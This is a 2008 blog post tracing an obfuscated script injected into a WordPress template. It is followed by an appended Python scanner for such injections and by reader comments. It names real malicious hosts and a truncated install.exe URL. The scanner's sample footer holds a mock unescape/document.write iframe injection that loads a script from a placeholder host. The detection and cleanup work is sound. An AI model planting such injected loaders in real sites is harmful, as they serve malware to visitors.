The one with the evil jscript on my blog…
August 24th, 2008
From time to time, when I visited this site from another machine, I noticed that a weird component wanted to install itself on that computer. I did not pay attention to it until very recently.
It just started to bug me, as I did not remember ever having used this ActiveX control, so I did a quick search on Google and found a forum topic suggesting that this might be a little more than an innocent mistake.
From time to time, I also received this dialog urging me to install the OP component from HIPOINT Ltd. I found no trace of them when Googling them. I could not reproduce this problem in a consistent fashion; it just showed up randomly.
I was also pointed to this article: Can you spot the fake. So I turned to Fiddler as well to find out what was going on.
“Fiddler is a HTTP Debugging Proxy which logs all HTTP traffic between your computer and the Internet. Fiddler allows you to inspect all HTTP Traffic, set breakpoints, and "fiddle" with incoming or outgoing data.”
I found the tinyurl.com reference really weird, as I had never used this service on my blog, and I was quite positive that I had never linked to vipasotka.com either. I also found references to golnanostat.com. I tried to search for these references in my pages, but could not find anything.
“This website wants to run the following add-on: Microsoft Data Access – Remote Data services Dat… from Microsoft Corporation. If you trust the website and the add-on and want to”
Navigating to the tinyurl reference produced the well-known message above and the dialog urging me to install the Java component.
I also noticed that the very first request after my main page is to r52hosts.org, for the page /stat/wpjsofif.js. This does not ring a bell either. So I searched the HTML code that came from www.littlebigtomatoes.com/blog, but again no luck. Then I tried all kinds of combinations and found the following code snippet with comments:
The JavaScript between the script tags was obfuscated, but debugging the script in Visual Studio revealed that it creates an iframe pointing to r52hosts.org and pulls in another encrypted JavaScript file.
After following and debugging several obfuscated scripts I got to the final page, the one that creates all the prompts in my browser. I still do not understand exactly what the code does, but it does not look very promising. Debugging the script shows that it is probing for class IDs, and the second screenshot shows that the script also tries to find the Start Menu Autostart folder. It also tries to run some kind of install.exe from http://golnanosat.com/adw.files/so14/7f751f….
After finding all this out, I am convinced that this script is malicious and I do not want anyone to download it from my site. Removing the scripts between the <!– start counter :rkgi58s:wpjsandif –> comments from my WordPress template solved my problem. There are no more r52hosts.org references when I access my blog.
Of course, I will keep monitoring my site, as I do not know exactly how this piece of script got there in the first place.
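The check I would want to keep running after a cleanup like the one above is a small scanner that flags the three things the post found: a marker comment wrapping a block the theme author never wrote, script or iframe tags whose src points at a host outside an allowlist, and inline scripts that lean on unescape/document.write/eval with long percent-encoded strings. The example below is added here and is not the blog's own code. The sample footer is constructed: the marker comment copies the form quoted in the post, but the matching "end counter" marker, the injected-host.invalid hostname (standing in for r52hosts.org and the other hosts named above), and the allowlist are my assumptions; the heuristics are my own and will not catch every obfuscation style.

```python
"""Scan a WordPress theme fragment for an injected script block and strip it.
Added example, not the blog's own code. SAMPLE_FOOTER is constructed input."""
import re
from urllib.parse import unquote, urlparse

# Constructed sample. The "end counter" marker form and the .invalid host are
# assumptions; the real injection on the blog may have looked different.
SAMPLE_FOOTER = """<div id="footer">
  <script type="text/javascript" src="/wp-content/themes/tomato/js/menu.js"></script>
  <script type="text/javascript" src="http://www.littlebigtomatoes.com/blog/wp-includes/js/comment-reply.js"></script>
  <!-- start counter :rkgi58s:wpjsandif -->
  <script type="text/javascript">
  var h = unescape("%69%6e%6a%65%63%74%65%64%2d%68%6f%73%74%2e%69%6e%76%61%6c%69%64");
  document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d") + '"http://' + h + '/stat/wpjsofif.js" width=0 height=0></iframe>');
  </script>
  <iframe src="http://injected-host.invalid/stat/wpjsofif.js" width="0" height="0"></iframe>
  <!-- end counter :rkgi58s:wpjsandif -->
</div>
</body>
</html>
"""

# Hosts the site is allowed to load script/iframe content from (assumption).
TRUSTED_HOSTS = frozenset({"littlebigtomatoes.com", "www.littlebigtomatoes.com"})

# A start/end comment pair with a label, in the form the post quotes.
MARKER_RE = re.compile(
    r"<!--\s*start counter\s*:(?P<label>[^>]*?)\s*-->(?P<body>.*?)<!--\s*end counter\s*:[^>]*-->",
    re.I | re.S,
)
# src attribute of a script or iframe opening tag.
SRC_RE = re.compile(r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_LITERAL_RE = re.compile(r"unescape\(\s*[\"']([^\"']*)[\"']\s*\)", re.I)
# Cheap obfuscation indicators; any one of them on its own is not proof.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "document.write": re.compile(r"document\.write\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "long-percent-escape": re.compile(r"(?:%[0-9a-fA-F]{2}){8,}"),
}


def find_injection_markers(html):
    """Labels of every start/end counter block found in the fragment."""
    return [m.group("label") for m in MARKER_RE.finditer(html)]


def find_external_refs(html, trusted=TRUSTED_HOSTS):
    """(tag, host, src) for script/iframe sources on hosts outside the allowlist.
    Relative URLs have no host and are treated as first-party."""
    refs = []
    for m in SRC_RE.finditer(html):
        tag, src = m.group(1).lower(), m.group(2)
        host = urlparse(src).hostname
        if host and host.lower() not in trusted:
            refs.append((tag, host.lower(), src))
    return refs


def find_obfuscated_inline_scripts(html):
    """For each inline <script> body, the sorted list of indicators it trips."""
    hits = []
    for m in INLINE_SCRIPT_RE.finditer(html):
        names = sorted(n for n, rx in INDICATORS.items() if rx.search(m.group(1)))
        if names:
            hits.append(names)
    return hits


def decode_escaped_literals(html):
    """Decode the string literals passed to unescape() so the analyst can read
    the hostnames and tags the script builds without executing it."""
    return [unquote(lit) for lit in UNESCAPE_LITERAL_RE.findall(html)]


def strip_marked_blocks(html):
    """Remove every marker block, comments included, as the post did by hand."""
    return MARKER_RE.sub("", html)


def scan(html, trusted=TRUSTED_HOSTS):
    """One report for a template fragment; suitable for a periodic re-check."""
    return {
        "markers": find_injection_markers(html),
        "external_refs": find_external_refs(html, trusted),
        "obfuscated_scripts": find_obfuscated_inline_scripts(html),
        "decoded_literals": decode_escaped_literals(html),
    }


if __name__ == "__main__":
    for key, value in scan(SAMPLE_FOOTER).items():
        print(f"{key}: {value}")
    print("clean:", scan(strip_marked_blocks(SAMPLE_FOOTER))["external_refs"])
```

Run it against the theme files (header.php, footer.php, and any file the theme includes) rather than against the rendered page alone, since the rendered page only shows what the injected block writes on that request; re-running scan() on a schedule is the monitoring the post says it will keep doing.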
November 4th, 2008 at 11:21 am
Thanks for the info. I got this msg when I visited a site. I get a warning but something initiated an install that I could not cancel.
November 4th, 2008 at 6:55 pm
This is no good. Did the install finish? I heard from a security expert that this install is some kind of trojan / malicious app.
April 6th, 2009 at 6:46 pm
Hello,
Did you completely solve that yellow pop-up issue?? See, I have the same problem. I KNOW a virus got into my computer. It was some kind of trojandownloader, and it was so annoying that I decided to format the HD to prevent the sites I run from getting infected too… But now I get this pop up from time to time and one of my writers told me that his antivirus blocked his access to the site. However, I can’t find any suspicious script in the site just like you did.
Any suggestion??
Thanks from Spain.
April 6th, 2009 at 7:08 pm
Something is definitely no good with the site you gave me in your comment. Google Chrome started using about 1.5 gig of RAM. I will check this out in Firefox. Do you use WordPress?
April 6th, 2009 at 7:17 pm
You have something funny in your HTML:
September 10th, 2009 at 2:38 pm
Hi! I was surfing and found your blog post… nice! I love your blog.
Cheers! Sandra. R.